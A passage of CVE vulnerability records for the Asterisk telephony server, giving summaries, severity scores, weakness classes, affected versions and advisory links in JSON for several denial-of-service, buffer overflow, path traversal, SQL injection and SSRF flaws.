                  "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29260"
                },
                {
                  "name": "http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html",
                  "refsource": "MISC",
                  "url": "http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2021-26712",
        "datePublished": "2021-02-18T20:10:20.000Z",
        "dateReserved": "2021-02-05T00:00:00.000Z",
        "dateUpdated": "2024-08-03T20:33:40.803Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2023-49786 (GCVE-0-2023-49786)

    Vulnerability from cvelistv5 – Published: 2023-12-14 19:47 – Updated: 2025-02-13 17:18
    VLAI
    Title
    Asterisk susceptible to Denial of Service via DTLS Hello packets during call initiation
    Summary
    Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6.
    SSVC
    Exploitation: poc Automatable: yes Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-703 - Improper Check or Handling of Exceptional Conditions
    Assigner
    Impacted products
    Vendor Product Version
    asterisk asterisk Affected: < 18.20.1
    Affected: >= 19.0.0, < 20.5.1
    Affected: = 21.0.0
    Affected: < 18.9-cert6
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-02T22:01:25.997Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq",
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
              },
              {
                "name": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05",
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
              },
              {
                "name": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race",
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "http://seclists.org/fulldisclosure/2023/Dec/24"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2023-49786",
                    "options": [
                      {
                        "Exploitation": "poc"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2024-10-08T14:19:55.907894Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2024-10-08T14:20:19.222Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "asterisk",
              "vendor": "asterisk",
              "versions": [
                {
                  "status": "affected",
                  "version": "\u003c 18.20.1"
                },
                {
                  "status": "affected",
                  "version": "\u003e= 19.0.0, \u003c 20.5.1"
                },
                {
                  "status": "affected",
                  "version": "= 21.0.0"
                },
                {
                  "status": "affected",
                  "version": "\u003c 18.9-cert6"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "HIGH",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.1"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-703",
                  "description": "CWE-703: Improper Check or Handling of Exceptional Conditions",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2023-12-29T00:06:18.647Z",
            "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
            "shortName": "GitHub_M"
          },
          "references": [
            {
              "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq",
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
            },
            {
              "name": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05",
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
            },
            {
              "name": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race",
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race"
            },
            {
              "url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
            },
            {
              "url": "http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html"
            },
            {
              "url": "http://seclists.org/fulldisclosure/2023/Dec/24"
            },
            {
              "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
            }
          ],
          "source": {
            "advisory": "GHSA-hxj9-xwr8-w8pq",
            "discovery": "UNKNOWN"
          },
          "title": "Asterisk susceptible to Denial of Service via DTLS Hello packets during call initiation"
        }
      },
      "cveMetadata": {
        "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "assignerShortName": "GitHub_M",
        "cveId": "CVE-2023-49786",
        "datePublished": "2023-12-14T19:47:46.306Z",
        "dateReserved": "2023-11-30T13:39:50.862Z",
        "dateUpdated": "2025-02-13T17:18:55.224Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2023-37457 (GCVE-0-2023-37457)

    Vulnerability from cvelistv5 – Published: 2023-12-14 19:43 – Updated: 2025-02-13 17:01
    VLAI
    Title
    Asterisk's PJSIP_HEADER dialplan function can overwrite memory/cause crash when using 'update'
    Summary
    Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the 'update' functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the 'update' functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa.
    CWE
    • CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
    Assigner
    Impacted products
    Vendor Product Version
    asterisk asterisk Affected: <= 18.20.0
    Affected: >= 19.0.0, <= 20.5.0
    Affected: = 21.0.0
    Affected: <= 18.9-cert5
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-02T17:16:30.273Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh",
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
              },
              {
                "name": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa",
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "asterisk",
              "vendor": "asterisk",
              "versions": [
                {
                  "status": "affected",
                  "version": "\u003c= 18.20.0"
                },
                {
                  "status": "affected",
                  "version": "\u003e= 19.0.0, \u003c= 20.5.0"
                },
                {
                  "status": "affected",
                  "version": "= 21.0.0"
                },
                {
                  "status": "affected",
                  "version": "\u003c= 18.9-cert5"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the \u0027update\u0027 functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "HIGH",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.1"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-120",
                  "description": "CWE-120: Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2023-12-29T00:06:20.393Z",
            "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
            "shortName": "GitHub_M"
          },
          "references": [
            {
              "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh",
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
            },
            {
              "name": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa",
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
            },
            {
              "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
            }
          ],
          "source": {
            "advisory": "GHSA-98rc-4j27-74hh",
            "discovery": "UNKNOWN"
          },
          "title": "Asterisk\u0027s PJSIP_HEADER dialplan function can overwrite memory/cause crash when using \u0027update\u0027"
        }
      },
      "cveMetadata": {
        "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "assignerShortName": "GitHub_M",
        "cveId": "CVE-2023-37457",
        "datePublished": "2023-12-14T19:43:30.945Z",
        "dateReserved": "2023-07-06T13:01:36.996Z",
        "dateUpdated": "2025-02-13T17:01:26.636Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2023-49294 (GCVE-0-2023-49294)

    Vulnerability from cvelistv5 – Published: 2023-12-14 19:40 – Updated: 2025-02-13 17:18
    VLAI
    Title
    Asterisk Path Traversal vulnerability
    Summary
    Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue.
    CWE
    • CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
    Assigner
    Impacted products
    Vendor Product Version
    asterisk asterisk Affected: < 18.20.1
    Affected: >= 19.0.0, < 20.5.1
    Affected: = 21.0.0
    Affected: < 18.9-cert6
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-02T21:53:45.375Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
              },
              {
                "name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
              },
              {
                "name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "asterisk",
              "vendor": "asterisk",
              "versions": [
                {
                  "status": "affected",
                  "version": "\u003c 18.20.1"
                },
                {
                  "status": "affected",
                  "version": "\u003e= 19.0.0, \u003c 20.5.1"
                },
                {
                  "status": "affected",
                  "version": "= 21.0.0"
                },
                {
                  "status": "affected",
                  "version": "\u003c 18.9-cert6"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 4.9,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "integrityImpact": "NONE",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-22",
                  "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2023-12-29T00:06:21.896Z",
            "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
            "shortName": "GitHub_M"
          },
          "references": [
            {
              "name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
            },
            {
              "name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
            },
            {
              "name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
            },
            {
              "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
            }
          ],
          "source": {
            "advisory": "GHSA-8857-hfmw-vg8f",
            "discovery": "UNKNOWN"
          },
          "title": "Asterisk Path Traversal vulnerability"
        }
      },
      "cveMetadata": {
        "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "assignerShortName": "GitHub_M",
        "cveId": "CVE-2023-49294",
        "datePublished": "2023-12-14T19:40:46.157Z",
        "dateReserved": "2023-11-24T16:45:24.314Z",
        "dateUpdated": "2025-02-13T17:18:40.277Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-46837 (GCVE-0-2021-46837)

    Vulnerability from cvelistv5 – Published: 2022-08-30 00:00 – Updated: 2024-08-04 05:17
    VLAI
    Summary
    res_pjsip_t38 in Sangoma Asterisk 16.x before 16.16.2, 17.x before 17.9.3, and 18.x before 18.2.2, and Certified Asterisk before 16.8-cert7, allows an attacker to trigger a crash by sending an m=image line and zero port in a response to a T.38 re-invite initiated by Asterisk. This is a re-occurrence of the CVE-2019-15297 symptoms but not for exactly the same reason. The crash occurs because there is an append operation relative to the active topology, but this should instead be a replace operation.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-04T05:17:42.455Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/AST-2021-006.html"
              },
              {
                "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
                "tags": [
                  "mailing-list",
                  "x_transferred"
                ],
                "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
              },
              {
                "name": "DSA-5285",
                "tags": [
                  "vendor-advisory",
                  "x_transferred"
                ],
                "url": "https://www.debian.org/security/2022/dsa-5285"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "res_pjsip_t38 in Sangoma Asterisk 16.x before 16.16.2, 17.x before 17.9.3, and 18.x before 18.2.2, and Certified Asterisk before 16.8-cert7, allows an attacker to trigger a crash by sending an m=image line and zero port in a response to a T.38 re-invite initiated by Asterisk. This is a re-occurrence of the CVE-2019-15297 symptoms but not for exactly the same reason. The crash occurs because there is an append operation relative to the active topology, but this should instead be a replace operation."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-11-18T00:00:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "url": "https://downloads.asterisk.org/pub/security/AST-2021-006.html"
            },
            {
              "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
              "tags": [
                "mailing-list"
              ],
              "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
            },
            {
              "name": "DSA-5285",
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://www.debian.org/security/2022/dsa-5285"
            }
          ]
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2021-46837",
        "datePublished": "2022-08-30T00:00:00.000Z",
        "dateReserved": "2022-08-30T00:00:00.000Z",
        "dateUpdated": "2024-08-04T05:17:42.455Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2022-26651 (GCVE-0-2022-26651)

    Vulnerability from cvelistv5 – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:11
    VLAI
    Summary
    An issue was discovered in Asterisk through 19.x and Certified Asterisk through 16.8-cert13. The func_odbc module provides possibly inadequate escaping functionality for backslash characters in SQL queries, resulting in user-provided data creating a broken SQL query or possibly a SQL injection. This is fixed in 16.25.2, 18.11.2, and 19.3.2, and 16.8-cert14.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T05:11:43.391Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/AST-2022-003.html"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html"
              },
              {
                "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
                "tags": [
                  "mailing-list",
                  "x_transferred"
                ],
                "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
              },
              {
                "name": "DSA-5285",
                "tags": [
                  "vendor-advisory",
                  "x_transferred"
                ],
                "url": "https://www.debian.org/security/2022/dsa-5285"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "An issue was discovered in Asterisk through 19.x and Certified Asterisk through 16.8-cert13. The func_odbc module provides possibly inadequate escaping functionality for backslash characters in SQL queries, resulting in user-provided data creating a broken SQL query or possibly a SQL injection. This is fixed in 16.25.2, 18.11.2, and 19.3.2, and 16.8-cert14."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-11-18T00:00:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "url": "https://downloads.asterisk.org/pub/security/"
            },
            {
              "url": "https://downloads.asterisk.org/pub/security/AST-2022-003.html"
            },
            {
              "url": "http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html"
            },
            {
              "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
              "tags": [
                "mailing-list"
              ],
              "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
            },
            {
              "name": "DSA-5285",
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://www.debian.org/security/2022/dsa-5285"
            }
          ]
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2022-26651",
        "datePublished": "2022-04-15T00:00:00.000Z",
        "dateReserved": "2022-03-07T00:00:00.000Z",
        "dateUpdated": "2024-08-03T05:11:43.391Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2022-26498 (GCVE-0-2022-26498)

    Vulnerability from cvelistv5 – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:03
    VLAI
    Summary
    An issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it is possible to download files that are not certificates. These files could be much larger than what one would expect to download, leading to Resource Exhaustion. This is fixed in 16.25.2, 18.11.2, and 19.3.2.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T05:03:32.984Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/AST-2022-001.html"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html"
              },
              {
                "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
                "tags": [
                  "mailing-list",
                  "x_transferred"
                ],
                "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
              },
              {
                "name": "DSA-5285",
                "tags": [
                  "vendor-advisory",
                  "x_transferred"
                ],
                "url": "https://www.debian.org/security/2022/dsa-5285"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "An issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it is possible to download files that are not certificates. These files could be much larger than what one would expect to download, leading to Resource Exhaustion. This is fixed in 16.25.2, 18.11.2, and 19.3.2."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2023-05-04T00:00:00.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "url": "https://downloads.asterisk.org/pub/security/"
            },
            {
              "url": "https://downloads.asterisk.org/pub/security/AST-2022-001.html"
            },
            {
              "url": "http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html"
            },
            {
              "name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
              "tags": [
                "mailing-list"
              ],
              "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
            },
            {
              "name": "DSA-5285",
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://www.debian.org/security/2022/dsa-5285"
            },
            {
              "url": "http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html"
            }
          ]
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2022-26498",
        "datePublished": "2022-04-15T00:00:00.000Z",
        "dateReserved": "2022-03-06T00:00:00.000Z",
        "dateUpdated": "2024-08-03T05:03:32.984Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2022-26499 (GCVE-0-2022-26499)

    Vulnerability from cvelistv5 – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:03
    VLAI
    Summary
    An SSRF issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it's possible to send arbitrary requests (such as GET) to interfaces such as localhost by using the Identity header. This is fixed in 16.25.2, 18.11.2, and 19.3.2.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T05:03:32.912Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/"
              },
              {
                "tags": [
                  "x_transferred"
                ],
                "url": "https://downloads.asterisk.org/pub/security/AST-2022-002.html"
              },
              {
                "tags": [
                  "x_transferred"
                ],
